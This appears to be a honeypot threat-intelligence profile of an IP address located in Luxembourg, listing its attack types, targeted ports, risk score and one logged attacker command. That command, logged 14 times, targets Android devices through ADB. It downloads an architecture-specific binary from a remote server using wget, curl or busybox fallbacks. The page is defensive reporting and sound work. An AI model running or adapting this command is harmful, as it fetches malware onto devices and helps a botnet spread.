TROYANOSYVIRUS
Active ThreatMEDIUM

176.65.139.60

Country of Origin🇱🇺 LU
First Detection3/29/2026
Last Activity4/10/2026
ISPOffshore LC
🎯
63
Total Attacks
🔌
4
Ports
📡
4
Attack Types
🦠
0
Malware

Geolocation

Country
🇱🇺 LU
City
Unknown
ASN
AS214472
ISP
Offshore LC

Attack Types

yaml_exploit_honeypot
adb_honeypot
web_honeypot
tcp_trap

Attacked Ports

80300030015555

Associated Malware

No associated malware

Executed Commands

$pkill target; cd /data/local/tmp/; export PATH=$PATH:/data/local/tmp:/system/bin:/system/xbin; arch=$(uname -m); case $arch in *arm*) target=zyre.arm7;; *86|*64) target=zyre.x86;; *) target=zyre.arm7;; esac; if ! [ -f $target ]; then (wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || curl -o $target http://103.130.214.71:1212/$target 2>/dev/null || busybox wget http://103.130.214.71:1212/$target -O $target 2>/dev/null || busybox curl -o $target http://103.130.214.71:1212/$target 14x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

55
/100
LowMediumHighCritical